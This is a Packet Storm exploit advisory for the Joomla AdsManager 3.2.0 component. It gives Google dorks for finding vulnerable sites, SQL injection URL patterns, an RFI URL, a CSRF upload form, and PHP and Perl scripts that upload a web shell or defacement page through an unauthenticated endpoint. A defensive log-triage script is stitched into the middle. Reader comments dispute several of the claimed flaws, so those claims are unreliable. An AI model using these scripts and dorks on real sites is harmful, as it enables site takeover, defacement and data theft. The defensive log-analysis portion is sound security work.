Joomla AdsManager 3.2.0 CSRF / Database Disclosure / SQL Injection
Posted Feb 21, 2019
Authored by KingSkrupellos

Joomla AdsManager component version 3.2.0 suffers from cross site request forgery, database disclosure, remote file inclusion, and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, code execution, sql injection, file inclusion, csrf
MD5 | 5564752e65defdfd7b0020bd14875166

######################################################################################################

# Exploit Title : Joomla AdsManager Components 3.2.0 CSRF / RFI / Backdoor Access / SQL Injection / Database Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 20/02/2019
# Vendor Homepage : joomprod.com ~ juloa.com
# Software Download Link : joomprod.com/download.html
github.com/amet17/webstar/tree/master/www/administrator/components/com_adsmanager/
# Software Information Link : extensions.joomla.org/extension/adsmanager/
# Software Affected Version : 1.0 ~ 2.5 ~ 2.6 ~ 2.9.13 ~ 3.1.0 - 3.2.0
and all previous versions may be vulnerable.
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Low / Medium
# Google Dorks : inurl:"/index.php?option=com_adsmanager"
intext:''Productos Software powered by Juloa.com''
intext:''Classifield Ads by AdsManager''
intext:''Designed by Ricky Browne T/as Redesigner.''
intext:''Designed by JoomlArt.com.''
intext:''Joomla Templates Club''
intext:''Aspetto grafico del sito curato da Gianni Marruccella''
intext:''Joomla 1.6 Template by sinci''
intext:''2019 Scuola Windsurf Salerno''
intext:''Powered by Joomla!. valid XHTML and CSS.''
intext:''Copyright (c) 2015 Morningdew Farms. All Rights Reserved.''
intext:''Site mis en ligne par NET'MOTIV''
intext:''Copyright (c) 2016 NWPCS - Ontwerp en realisatie: Foppenreclame BV Harderwijk''
intext:''Powered by Fabio Panna Joomla template by SiteGround''
intext:''La Centrale des Annonces est editee par la Sarl Quartz''
More on Google and other Search Engines ......
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
CWE-352 [ Cross-Site Request Forgery (CSRF) ]
CWE-264 [ Permissions, Privileges, and Access Controls ]
CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

######################################################################################################

# Description about Software :
***************************
AdsManager is the leading classified ads component for Joomla!

Real Estate, Cars, Pets, Electronics, Furniture, etc .....

whatever your classified project is, AdsManager can be configured to fit many needs.

AdsManager provides plenty of options, flexible views and extensions to help you to build your website.

######################################################################################################

# Impact and Consequences :
**************************

* Joomla AdsManager is prone to CSRF, RFI, arbitrary file upload and SQL injection vulnerabilities.

* The AdsManager component for Joomla, version 3.2.0 and earlier, is prone to an SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. A remote attacker can send a specially crafted request to the vulnerable application and execute arbitrary SQL commands in the application's database. Further exploitation of this vulnerability may result in unauthorized data manipulation. An attacker can exploit this issue using a browser.

* The component is prone to an arbitrary file upload / shell upload vulnerability. The vulnerability is due to a design flaw in the way the application handles a file upload request without authentication. A remote attacker may be able to exploit this to execute arbitrary code within the context of the application by uploading an arbitrary file without any authentication. System compromise: remote attackers can gain control of vulnerable systems.

* The component is prone to a cross-site request forgery vulnerability due to insufficient CSRF protection. An attacker can exploit this issue to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible. The web application does not, or cannot, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted it.

* The AdsManager component is prone to a remote file include vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

######################################################################################################

# PHP - PERL - Cross Site Request Forgery - Remote File Inclusion / File Upload / Shell Upload - SQL Injection Exploits :
*********************************************************************************************************
######################################################################################################

# SQL Injection Exploit =>
**************************
/index.php?option=com_adsmanager&Itemid=[SQL Injection]

/index.php?option=com_adsmanager&page=write_ad&Itemid=[SQL Injection]

/index.php?option=com_adsmanager&page=show_all&Itemid=[SQL Injection]

/index.php?option=com_adsmanager&page=show_user&Itemid=[SQL Injection]

/index.php?option=com_adsmanager&page=show_rules&Itemid=[SQL Injection]

/index.php?option=com_adsmanager&page=show_profile&Itemid=[SQL Injection]

/index.php?option=com_adsmanager&view=list&catid=[SQL Injection]

/index.php?option=com_adsmanager&page=show_ad&adid=[ID-NUMBER]&catid=[ID-NUMBER]&Itemid=[SQL Injection]

/index.php?option=com_adsmanager&view=list&catid=[ID-NUMBER]&Itemid=[SQL Injection]

/index.php?option=com_adsmanager&view=list&catid=[ID-NUMBER]&Itemid=[ID-NUMBER]&limitstart=[SQL Injection]

/index.php?option=com_adsmanager&view=details&id=[ID-NUMBER]&ad_tier=[ID-NUMBER]&catid=[SQL Injection]

/index.php?option=com_adsmanager&view=list&format=feed&catid=[ID-NUMBER]&Itemid=[SQL Injection]

/index.php/component/option,com_adsmanager/page,show_category/catid,1/order,0/limit,20/limitstart,0/expand,0/Itemid,30/ => [ SQL Error ]

/index.php?option=com_adsmanager&page=show_category&catid=[ID-NUMBER]&text_search=&order=[ID-NUMBER]&expand=[ID-NUMBER]&Itemid=[SQL Injection]

/index.php?option=com_adsmanager&page=show_user&userid=[ID-NUMBER]&order=[ID-NUMBER]&expand=[ID-NUMBER]&order=[ID-NUMBER]&Itemid=[SQL Injection]

######################################################################################################

# Database Disclosure Exploit =>
*******************************
/administrator/components/com_adsmanager/install.sql

######################################################################################################

Direct Access Exploit =>
***********************
/index.php?option=com_adsmanager&task=upload&tmpl=component

/index.php?option=com_adsmanager&task=upload&tmpl=component&Itemid=[ID-NUMBER]

# Example Upload Endpoint Responses (JSON) :
******************************************
{"jsonrpc" : "2.0", "result" : null, "id" : "id"}

{"jsonrpc" : "2.0", "result" : null, "id" : "id","tmpfile" : "_95"}

{"jsonrpc" : "2.0", "result" : null, "id" : "id","tmpfile" : "_100"}

{"jsonrpc" : "2.0", "result" : null, "id" : "id","tmpfile" : "_4206"}

Shell Uploaded =>
*******************
{"jsonrpc" : "2.0", "result" : null, "id" : "id","tmpfile" : "SHELLNAMEHERE-CYBERIZM.php"}

# Directory File Path :
*******************

/tmp/plupload/[SHELLNAMEHERE-CYBERIZM.php]

Another Direct Access Exploit =>
*****************************
/index.php?option=com_adsmanager&page=write_ad&catid=3&Itemid=1

/index.php?option=com_adsmanager&page=write_ad&catid=[ID-NUMBER-MAY-DIFFER]&Itemid=[ID-NUMBER-MAY-DIFFER]

/index.php?option=com_adsmanager&Itemid=694&task=write&catid=71

/index.php?option=com_adsmanager&Itemid=[ID-NUMBER-MAY-DIFFER]&task=write&catid=[ID-NUMBER-MAY-DIFFER]

Check the Page =>
***************
/index.php?option=com_adsmanager&page=show_all&Itemid=1

# Directory File Path :
*******************
/images/com_adsmanager/ads/[RANDOMNUMBERS-ALPHABET].jpg .gif .png .php;.gif
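The request patterns listed above (non-numeric values in the Itemid/catid/limitstart style parameters, POSTs to the unauthenticated task=upload endpoint, fetches of install.sql, and .php files served from /tmp/plupload/ or /images/com_adsmanager/ads/) can be triaged from web server access logs. The following Python script is an added example written for this page, not part of the advisory; the log lines it parses are constructed samples in Apache combined format and the finding labels are my own.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache combined format), not real traffic.
# Lines 2-5 mirror the request patterns from the advisory; lines 1 and 6 are benign.
SAMPLE_LOG = """\
203.0.113.5 - - [21/Feb/2019:10:01:02 +0000] "GET /index.php?option=com_adsmanager&view=list&catid=3&Itemid=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [21/Feb/2019:10:01:09 +0000] "GET /index.php?option=com_adsmanager&view=list&catid=3&Itemid=12'%20AND%201=1-- HTTP/1.1" 500 311 "-" "Mozilla/5.0"
198.51.100.9 - - [21/Feb/2019:10:02:15 +0000] "POST /index.php?option=com_adsmanager&task=upload&tmpl=component HTTP/1.1" 200 73 "-" "Mozilla/5.0"
198.51.100.9 - - [21/Feb/2019:10:02:16 +0000] "GET /tmp/plupload/x7f2.php HTTP/1.1" 200 45 "-" "Mozilla/5.0"
198.51.100.9 - - [21/Feb/2019:10:03:00 +0000] "GET /administrator/components/com_adsmanager/install.sql HTTP/1.1" 200 9876 "-" "curl/7.64.0"
192.0.2.7 - - [21/Feb/2019:10:04:00 +0000] "GET /index.php?option=com_adsmanager&page=show_ad&adid=15&catid=3&Itemid=12 HTTP/1.1" 200 6000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Parameters the advisory lists as injection points; all are numeric ids in normal use.
NUMERIC_PARAMS = ("Itemid", "catid", "adid", "userid", "limitstart")
# A .php name in either upload directory, including the name.php;.gif variant.
UPLOAD_DIR_RE = re.compile(r"^/(tmp/plupload|images/com_adsmanager/ads)/[^/]*\.php")


def classify(method, path):
    """Return finding labels for one request (empty list = nothing suspicious)."""
    parts = urlsplit(path)
    qs = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    findings = []
    if qs.get("option") == ["com_adsmanager"]:
        for param in NUMERIC_PARAMS:
            if any(not v.isdigit() for v in qs.get(param, [])):
                findings.append(f"sqli-probe:{param}")
        if method == "POST" and qs.get("task") == ["upload"]:
            findings.append("unauth-upload-endpoint")
    if parts.path.endswith("/components/com_adsmanager/install.sql"):
        findings.append("install-sql-fetch")
    if UPLOAD_DIR_RE.search(parts.path):
        findings.append("php-in-upload-dir")
    return findings


def triage(log_text):
    """Return (ip, path, findings) for every suspicious request in the log."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = classify(m["method"], m["path"])
        if findings:
            hits.append((m["ip"], m["path"], findings))
    return hits


if __name__ == "__main__":
    for ip, path, findings in triage(SAMPLE_LOG):
        print(f"{ip}  {', '.join(findings)}  {path}")
```

The check keys on query-string parameters, so SEF-style URLs of the comma form shown above (/index.php/component/option,com_adsmanager/...) need a separate path-based rule.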

######################################################################################################

# PHP Exploiter Code [ Proof of Concept PoC ] =>
**********************************************
<?php
$url = "www.[VULNERABLESITEHERE].gov/index.php?option=com_adsmanager&task=upload&tmpl=component"; // put URL Here
$post = array
(
"file" => "@SHELLNAMEHERE-CYBERIZM.jpg",
"name" => "SHELLNAMEHERE-CYBERIZM.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>

######################################################################################################

# Another PHP Exploitation Code [ Proof of Concept PoC ] =>
*******************************************************

error_reporting(1);
set_time_limit(0);
ini_set('display_errors', 1);
ini_set('max_execution_time', 0);
ini_set('allow_url_fopen', 1);
ob_implicit_flush(true);
ob_end_flush();
function __plus() {
ob_flush();
flush();
}
function __request($params) {
$objcurl = curl_init();
curl_setopt($objcurl, CURLOPT_URL, "{$params['host']}/index.php?option=com_adsmanager&task=upload&tmpl=component");
curl_setopt($objcurl, CURLOPT_POST, 1);
curl_setopt($objcurl, CURLOPT_HEADER, 1);
curl_setopt($objcurl, CURLOPT_REFERER, $params['host']);
curl_setopt($objcurl, CURLOPT_POSTFIELDS, array("file" => "@SHELLNAMEHERE-CYBERIZM.jpg", "name" => "SHELLNAMEHERE-CYBERIZM.php"));
curl_setopt($objcurl, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($objcurl, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($objcurl, CURLOPT_FOLLOWLOCATION, 1);
$info['corpo'] = curl_exec($objcurl);
$info['server'] = curl_getinfo($objcurl);
curl_close($objcurl);
$gh = get_headers($params['cmd'], 1);
foreach ($gh as $key => $value) {
echo " [INFO][{$key}]:: {$value}\n";
}
$_x = (strstr(($gh[0] . (isset($gh[1]) ? $gh[1] : NULL)), '200'));
echo "--------------------------------------------------------------\n";
print " [INFO][COD]:: " . (!empty($_x) ? '[+] VULL' : "[-] NOT VULL\n");
if (strstr($info['corpo'], '"tmpfile" : "SHELLNAMEHERE-CYBERIZM.php"')) {
print "\n [INFO][URL][SHELL]:: " . (!empty($_x) ? "[+] {$params['cmd']}" . file_put_contents("Exploit_ArbitraryFileUploadAdsManager_Joomla.txt", "{$params['cmd']}\n\n", FILE_APPEND) : '[-] ERROR!');
print "\n [INFO] Successfully Upload!\n";
}
echo "--------------------------------------------------------------\n";
}
echo "\n [+] Joomla ADSmanager Exploit Arbitrary File Upload Vulnerability By Cyberizm Digital Security Army\n\n";
$params = array('cmd' => "{$argv[1]}/tmp/plupload/SHELLNAMEHERE-CYBERIZM.php", 'host' => isset($argv[1]) ? (strstr($argv[1], 'http') ? $argv[1] : "http://{$argv[1]}") : exit("\n0x[ERRO] DEFINE TARGET!\n"));
__request($params) . __plus();

######################################################################################################

# Usage of this Exploit =>
************************

# EXECUTE: php exploit.php www.VULNERABLESITE.gov
# OUTPUT: Exploit_AFU_Joomla.txt
# FILE UPLOAD: SHELLNAMEHERE-CYBERIZM.jpg => code shell: <?php system('id'); ?>

# Directory File Path : /tmp/plupload/[SHELLNAMEHERE-CYBERIZM.php]

######################################################################################################

# Another Perl Exploiter Code [ Proof of Concept PoC ] =>
***************************************************
#!/usr/bin/perl

my $ua = LWP::UserAgent->new;

system(($^O eq 'MSWin32') ? 'cls' : 'clear');

print <<logo;

CYBERIZM DIGITAL SECURITY ARMY

logo

print "\n[-] Joomla AdsManager File Upload/Shell Upload Exploit\n";

print "\nEnter Target URL : ";
my $url=<>;
chomp($url);

my $exploit = "$url/index.php?option=com_adsmanager&task=upload&tmpl=component";

my $response = $ua->post( $exploit, ookie => "", Content_Type => "form-data", Content => [file => ["kingskrupellos.jpg"], name => "kingskrupellos.html"]);

$shell="$url/tmp/plupload/kingskrupellos.html";

$payload = $ua->get("$shell")->content;
if($payload =~/Hacked/)
{
print "\nDeface Uploaded successfully = $shell \n";
}
else {
print "\nTarget Is Not Vulnerable\n";
}

print "\n Back To list or No(Y or N) : ";
my $let=<>;
chomp($let);
if ($let eq "y" or $let eq "Y")
{
local $CWD = '../../../..';
system "perl cyberizm.pl";
}
elsif ($let eq "n" or $let eq "N")
{
system "";
}

######################################################################################################

# Remote File Inclusion Exploit =>
******************************

/index.php?option=com_adsmanager&mosConfig_absolute_path=[shell.txt?]

######################################################################################################

# Learn PHP Version for AdsManager Exploit =>
*******************************************
/phpinfo.php/index.php?option=com_adsmanager

Example =>

PHP Version 5.1.6
PHP Credits
Configuration
PHP Core
apache2handler
Apache Environment
HTTP Headers Information
PHP Variables
PHP License

######################################################################################################

# CSRF Cross Site Request Forgery Exploiter =>
******************************************

<form method=POST action=http://[VULNERABLESITE].gov/index.php?option=com_adsmanager&task=upload&tmpl=component
enctype=multipart/form-data>
<input type=file name=files[] /><button>Upload</button>
</form>

#####################################################################################################

# Example Error Disclosure (PHP warning revealing server paths) =>
***************************************************************
Warning: include_once(/home/centralexf/www/administrator/components/com_comprofiler/ue_config.php) [function.include-once]: failed to open stream: No such file or directory in /home/centralexf/www/components/com_adsmanager/views/edit/tmpl/default.php on line 275

######################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

######################################################################################################

Comments (2)

osvdb

# Database Disclosure Exploit
^ not a vulnerability. just because it is ".sql" doesn't mean you are getting the actual database. this is part of the installation routine.

A lot of these others are suspect for various reasons. Please find someone that will help you write more coherent advisories that demonstrate the vulnerabilities.

Comment by osvdb, 2019-02-22 19:25:36 UTC
kingskrupellos

Dear Friend osvdb;
OK. Yes, you are partly right. But it is not wrong. These .sql files for the database are only the installation and uninstallation parts of this Joomla and other CMSs.
And they are mostly database name, username, password, hostname and various files for Joomla, for example.
Of course, it is not the actual database. But some websites have the actual database by themselves.
But these database disclosure exploits are only for SQL database files. You misunderstand something.
There are many, many examples of database disclosures on various platforms like cxsecurity, packetstormsecurity, milw0rm, exploit-db and others....
Impact => An attacker can access information that should normally be inaccessible.
Worst-Case Scenario => An attacker can execute arbitrary commands through malformed SQL injection strings.
This would allow the attacker to set up a backdoor or persistent point of access into your network.
Also, it might be possible to expose confidential customer information or business records by compromising your back-end database.
Causes => Improper input validation is the most common cause of this vulnerability.
You shouldn't always give negative comments. You can e-mail me. Do not misguide people.
Proof of Concept for Database Topic => IBM CVSS Score: CVSS 3.0 Base Score 5.3 and CVSS 3.0 Temporal Score 4.7
According to IBM => AdsManager extension for Joomla database information disclosure:
AdsManager extension for Joomla could allow a remote attacker to obtain sensitive information, caused by improper access control for the database files.
By sending a direct request, a remote attacker could exploit this vulnerability to obtain .sql backup files from the database.
exchange.xforce.ibmcloud.com/vulnerabilities/157375
ScreenShot => s2.eksiup.com/13ab4de6c406.png
According to IBM => AdsManager extension for Joomla SQL Injection =>
CVSS 3.0 Base Score 6.5 - CVSS 3.0 Temporal Score 6.3
AdsManager extension for Joomla is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements to the index.php script using the Itemid, limitstart or catid parameter, which could allow the attacker to view, add, modify or delete information in the back-end database.
exchange.xforce.ibmcloud.com/vulnerabilities/157376
ScreenShot => s2.eksiup.com/ed9d38db6994.png
AdsManager extension for Joomla cross-site request forgery => CVSS 3.0 Base Score 4.3 => CVSS 3.0 Temporal Score is 3.8.
According to IBM => AdsManager extension for Joomla is vulnerable to cross-site request forgery, caused by improper validation of user-supplied input. By persuading an authenticated user to visit a malicious Web site, a remote attacker could send a malformed HTTP request.
An attacker could exploit this vulnerability to perform cross-site scripting attacks, Web cache poisoning, and other malicious activities.
exchange.xforce.ibmcloud.com/vulnerabilities/157374
ScreenShot => s2.eksiup.com/b09764f30243.png
Everything has a proof. They are vulnerabilities because an attacker can access information that should normally be inaccessible.
For example, you can see they are only installation/uninstallation SQL database files; you can see this originally on the Joomla site.
docs.joomla.org/How_to_apply_a_.sql_file_to_a_database
joomlashack.com/blog/how-tos/miscellaneous/how-to-export-your-joomla-database-with-phpmyadmin/
astemplates.com/itemdetails.php?id=59&page=howto&article=38
docs.joomla.org/Creating_a_Database_for_Joomla!
Have a nice day.

Comment by kingskrupellos, 2019-02-23 22:11:37 UTC
